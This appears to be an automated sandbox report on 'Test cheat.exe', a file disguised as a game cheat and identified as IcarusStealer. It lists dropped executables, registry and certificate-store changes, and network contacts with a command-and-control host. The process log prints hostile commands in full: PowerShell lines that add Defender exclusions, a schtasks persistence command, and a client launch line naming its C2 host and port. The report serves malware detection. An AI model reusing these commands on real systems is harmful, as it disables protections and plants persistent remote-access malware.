Analysis Overview
SHA256
13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882
Threat Level: Known bad
The file Test cheat.exe was found to be: Known bad.
Malicious Activity Summary
IcarusStealer
Modifies Installed Components in the registry
Blocklisted process makes network request
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Delays execution with timeout.exe
Enumerates system info in registry
Suspicious use of SetWindowsHookEx
Modifies registry class
NTFS ADS
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Suspicious behavior: GetForegroundWindowSpam
Modifies system certificate store
Uses Volume Shadow Copy service COM API
Uses Volume Shadow Copy WMI provider
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Checks SCSI registry key(s)
Uses Task Scheduler COM API
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-03-09 22:40
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-09 22:40
Reported
2024-03-09 22:42
Platform
win7-20240221-en
Max time kernel
150s
Max time network
147s
Command Line
Signatures
IcarusStealer
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test cheat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Test cheat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\switched.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\CatRoot\$SXR\Read.txt | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File created | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot\$SXR\Read.txt | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2540 set thread context of 776 | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tesetey.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\CatRoot\$SXR\$SXR.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\Test cheat.exe
"C:\Users\Admin\AppData\Local\Temp\Test cheat.exe"
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\switched.exe
"C:\Users\Admin\AppData\Local\Temp\switched.exe"
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
"C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
"C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\getngk55\getngk55.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1AC1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCD5AC9B0E9E34FA5B096EC3B1E36CCE.TMP"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe & exit
C:\Windows\system32\ctfmon.exe
ctfmon.exe
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp2AF7.tmp.bat""
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Windows\System32\CatRoot\$SXR\$SXR.exe
"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "$SXR"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp87FD.tmp.bat""
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp87FE.tmp.bat" "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" title $SXR "
C:\Windows\SysWOW64\schtasks.exe
schtasks /delete /f /tn "$SXR"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" title $SXR "
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | keyauth.win | udp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | case-shield.gl.at.ply.gg | udp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 104.26.0.5:443 | keyauth.win | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | operating-noble.gl.at.ply.gg | udp |
| US | 147.185.221.18:52033 | operating-noble.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:49219 | tcp | |
| N/A | 127.0.0.1:49221 | tcp | |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| N/A | 127.0.0.1:49304 | tcp | |
| N/A | 127.0.0.1:49306 | tcp | |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.18:52033 | operating-noble.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
| US | 147.185.221.17:26501 | case-shield.gl.at.ply.gg | tcp |
Files
\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 8b7a784dda2183c2d9929c924b461dde |
| SHA1 | ce54c000dddb30e0b7f70ef1ca23a632f5fc0b08 |
| SHA256 | 63d395274f384184743c4215ac0247f01d4a1d487bc3309f44019a69daa1ca76 |
| SHA512 | 5d52fa03b67524eb36c84ac41e9bd0800f1b61c222fb32750252fb73d3973c14d14395da1a96d3bce6632c32fd4ef13e4cd217782b6f21f527ee3e60583488be |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 561ac87947d5c7c417d7560f5678bd8a |
| SHA1 | a0ae489d250188d3276e4769f31caf63c341de53 |
| SHA256 | 9f75a805c9652d479a62d1b99340db6f037fbab3799137dc5efbbe134d27bd77 |
| SHA512 | 7c7eff2df1f3f6ea467e43fe894b277cf0ec7e826447109a635aeb17452d78e36e4dd87d3e34a1d71646ed50de5d7834ec26f5b060ce7ab1b9700da1ea8beb3b |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 173bb72da1722594b6e2242b93045304 |
| SHA1 | d6f798eeda2ea8246a0b78700429f6b7c69c052c |
| SHA256 | 18217961fcb7af721ea8f1a75dbaa913949edbd036492787a4402101bf18d965 |
| SHA512 | f00edacc50e4edbfdf284a1a77c451fc52c4e3e6df2bd06d63d9c29fb85063a8249ee19b64d1fc9dfa7bf89d223befd02e511d38de469568e6ded9355b8797d0 |
\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | 08c76a550813c1937ed36274c4c3f8e4 |
| SHA1 | 2c3a12503b6cb47e6442a545485f4618078e5606 |
| SHA256 | 465465df17398641de4ce3da17334d23854d82129dade1f53d0a643e978c9ae9 |
| SHA512 | 14ea6914da9518fc12420984612a51540b1a30d4067c4f2da0887f6822ea8d41f65cc2a36836f3a01e60b000c0d35592016a88c2d1648f26d61a8ca75ed3e50a |
C:\Users\Admin\AppData\Local\Temp\switched.exe
| MD5 | b08718b6e72babef0628b16cb4eebac4 |
| SHA1 | 03b9457474df44919aa4c27782aa5b99697597f8 |
| SHA256 | 3f3d8c4eb1c1609a23b12a5447afda0db33fa2c6ed8244d278c0ba30c8fe4468 |
| SHA512 | 5911ceaf42de98be1f7ffcd327dc9c1c044f7174a7ed54a1a3fab000817fca4aa98a660932ff839df51fc3b1fb2a82cf9c0e3d3f5b8d2d800261a9f61029e798 |
memory/2180-14-0x0000000000100000-0x0000000000740000-memory.dmp
\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 1f60f00a428d7c6c07cff90e538b9e6c |
| SHA1 | 85d6ed4c48b836e35bea3b8292f7e455b909dea6 |
| SHA256 | de42eeb358108287d4cfa882f372d17d89f417bfdae5311a685ae15ab9b5307d |
| SHA512 | 17b0fbdfa9fc976c47011798c7ccbd3b38c1f86af3cfdd535518f0b00b244c38d860500120cf951d8acfec8c10e1a4b3039eedc6d21eb5814d9d31c41fcb54f3 |
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | f651fa5a4f8085bd2b76ea7ef65ad8f4 |
| SHA1 | eced0a11555b6bb65081e8fb8a9efb7c6f830f36 |
| SHA256 | ede0d7a91bfbfeb32e032c74a61875db7b68b9c503c288920f149d7bc73e5062 |
| SHA512 | cace1426d28ee8acca0c7a8997af2ba5513d4c04ab78203c00db4a047f268cd21290ddb69bce11c523596de11c508e6a2d9da541dfd30863b939adc4166aa077 |
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | bddc81fc4196be2c84c4792479c1eea3 |
| SHA1 | f83773e11c1a9e7dd53328aaa616f01b8e51c615 |
| SHA256 | 7f7c70b879a1253915c04cd61179d0432c6168c474b39b80fa68a1f8dfaa4aad |
| SHA512 | 04584e1962a30f278354b1ac1de459b61614c0838faa761bb8c1a858919f0b84e993bf937a290279cc5f0cad3f692d2be377e0d4c18fc252013d17f44d2b49a0 |
memory/2180-26-0x0000000074520000-0x0000000074C0E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
| MD5 | 959a5cd6925278984c5b9a1cea16f578 |
| SHA1 | 2971c9b5db766d61123e39af796069bceb446109 |
| SHA256 | 682ecb22c99751c368f4cfbc756a256af4539195d5abdee3f67c58bcd8584577 |
| SHA512 | b050a58e69856b794213b63ac2a0e47d1684f9e7c300d7d1b9afde27e12d43ca6b44f9305542189de2cbce74c364fb22c9046b5b86b680987962a64378c00fd3 |
memory/2604-27-0x000000013FAD0000-0x000000013FF0C000-memory.dmp
\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | 0f0838bc6642dd6bc603368e50b4aba3 |
| SHA1 | 932bd4d1c11996bf8ac3ac74a94b266e96d44c36 |
| SHA256 | 4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9 |
| SHA512 | a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860 |
C:\Users\Admin\AppData\Local\Temp\tesetey.exe
| MD5 | e4dc0eaff2f28a6243828b1e6edaba96 |
| SHA1 | 9da8cb3b7cf2b11fc53bf4dfc7cbb8eb444821c6 |
| SHA256 | 53c929e421bd70f561064b536a6723b8b4ba38493081068c84ec788ace76cbda |
| SHA512 | 11a719fb5ce44fabb050c8bed3237068e0c304d94ed375df881afe5f828a5316cec3a09c4f8f1e863a2ed06f92cb3b2d66716dcb5c97b7b49d3a957e916f8035 |
memory/2540-29-0x0000000001270000-0x00000000012F2000-memory.dmp
memory/2540-30-0x0000000074520000-0x0000000074C0E000-memory.dmp
memory/2540-31-0x0000000004AE0000-0x0000000004B20000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\getngk55\getngk55.cmdline
| MD5 | 7634e18b331cd3970e0b24f2415d09f6 |
| SHA1 | dff955bd27d077606e160f62ac859e1a677fccc5 |
| SHA256 | db5f49cae418ac4355f6e33639683dd4482957177c3d54bcd6b078bc147dced5 |
| SHA512 | e582c989113326890177162adaf027271774f724aca1dfc3987f93bba1eaad6eb6caf555e6b6cbf71e2f1b182fac9551d171ff50e324f47520273a00f63a5fd6 |
\??\c:\Users\Admin\AppData\Local\Temp\getngk55\getngk55.0.cs
| MD5 | 14846c9faaef9299a1bf17730f20e4e6 |
| SHA1 | 8083da995cfaa0e8e469780e32fcff1747850eb6 |
| SHA256 | 61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b |
| SHA512 | 549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1 |
C:\Users\Admin\AppData\Local\Temp\RES1AC1.tmp
| MD5 | 6f466a0fa7bae7c4e5041630103568e1 |
| SHA1 | 213e38628df7906ba9089a9772c39d9b943be65e |
| SHA256 | 91df12fced240466f3a59c7de9a6bd6ce9aa8e8043e48b442ca53bc8e6934484 |
| SHA512 | e5efbddae6d0383c1f8296dc5809f6952ddd87a2c13ae319e35a5375521fe5b569d822c8b317fa27f6a0d4e3a8302e5a6252b0ecb9e99299921c192c8947e6f2 |
memory/776-48-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp
memory/776-47-0x0000000000400000-0x0000000000424000-memory.dmp
memory/776-49-0x0000000000400000-0x0000000000424000-memory.dmp
memory/776-46-0x0000000000400000-0x0000000000424000-memory.dmp
memory/776-45-0x0000000000400000-0x0000000000424000-memory.dmp
memory/776-44-0x0000000000400000-0x0000000000424000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\CSCCD5AC9B0E9E34FA5B096EC3B1E36CCE.TMP
| MD5 | 8cb2d1f69e2730b5de634f6b6c12005f |
| SHA1 | 1f9496195f09f58a4e382994717a5da34086d770 |
| SHA256 | f5d616663ac61dc843c8663f2ceaaf6939b974ffd74e6e1be232b3fe8c6667ea |
| SHA512 | d035c16a8d8f09abedc94e10d46983e371d2862b277128fe00184d3a1cbb8a69367c08e150c63b07729938bea6644af4e3913e629969d38978b0d934e9e61eda |
memory/776-51-0x0000000000400000-0x0000000000424000-memory.dmp
memory/776-53-0x0000000000400000-0x0000000000424000-memory.dmp
\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
| MD5 | 346e44f9bb62962c066541ae116fb9de |
| SHA1 | 3a3e78c179e6d8c6cca67789251131e6bffef573 |
| SHA256 | 093157f2c3e2d29edac4f733eba0721e6e2ca2392fe503be43d764dff42447be |
| SHA512 | 9ceb62e28cefd2a7358888299a527bb6fb6f8b1f667384640d1f5eaf3d18a2c1ddf7798235024234b80945a23a8ce61ea01506883f41a119e8d6f92768412aa2 |
memory/776-59-0x00000000020D0000-0x0000000002110000-memory.dmp
memory/776-58-0x0000000074520000-0x0000000074C0E000-memory.dmp
memory/1744-60-0x00000000010C0000-0x00000000010C8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 303e0c799eb99638c1b6e251673801c4 |
| SHA1 | a347eb0e79dfbb351c3f4f00ad36c63881473c82 |
| SHA256 | de56c1e58c3abb14c7616fe6cc23fcd8b1de1d4cd67cbdd3e2aeaac607e1d705 |
| SHA512 | cffd062e1ae7a9df10072daa85f1076a2e8b32f001751be8af9f7e0b647c7328b54bb8d927b23ab5b6d96616de9c300fc4f875b2d442a38b519e0e2fe391d62a |
memory/1744-68-0x000007FEF55D0000-0x000007FEF5FBC000-memory.dmp
memory/2136-69-0x000000006EED0000-0x000000006F47B000-memory.dmp
memory/348-70-0x000000006EED0000-0x000000006F47B000-memory.dmp
memory/348-71-0x000000006EED0000-0x000000006F47B000-memory.dmp
memory/348-72-0x0000000002B90000-0x0000000002BD0000-memory.dmp
memory/2136-73-0x0000000002F70000-0x0000000002FB0000-memory.dmp
memory/2136-74-0x0000000002F70000-0x0000000002FB0000-memory.dmp
memory/2136-75-0x0000000002F70000-0x0000000002FB0000-memory.dmp
memory/2136-76-0x000000006EED0000-0x000000006F47B000-memory.dmp
memory/348-78-0x0000000002B90000-0x0000000002BD0000-memory.dmp
memory/348-77-0x0000000002B90000-0x0000000002BD0000-memory.dmp
memory/2136-82-0x000000006EED0000-0x000000006F47B000-memory.dmp
memory/348-81-0x000000006EED0000-0x000000006F47B000-memory.dmp
memory/2180-83-0x0000000002490000-0x00000000024D0000-memory.dmp
memory/1744-84-0x000000001AFD0000-0x000000001B050000-memory.dmp
memory/2180-85-0x0000000074520000-0x0000000074C0E000-memory.dmp
memory/2604-86-0x000000013FAD0000-0x000000013FF0C000-memory.dmp
memory/2540-87-0x0000000074520000-0x0000000074C0E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp2AF7.tmp.bat
| MD5 | 7bf30d1344be7dbe7c4c72fd92c88e3e |
| SHA1 | bbfe1c5da1c1b9c9042f0536579e342c47b07cc1 |
| SHA256 | 449b4f88759e0264874fabcbe6f4438227db5627834d697f2d0a14b319b3f46c |
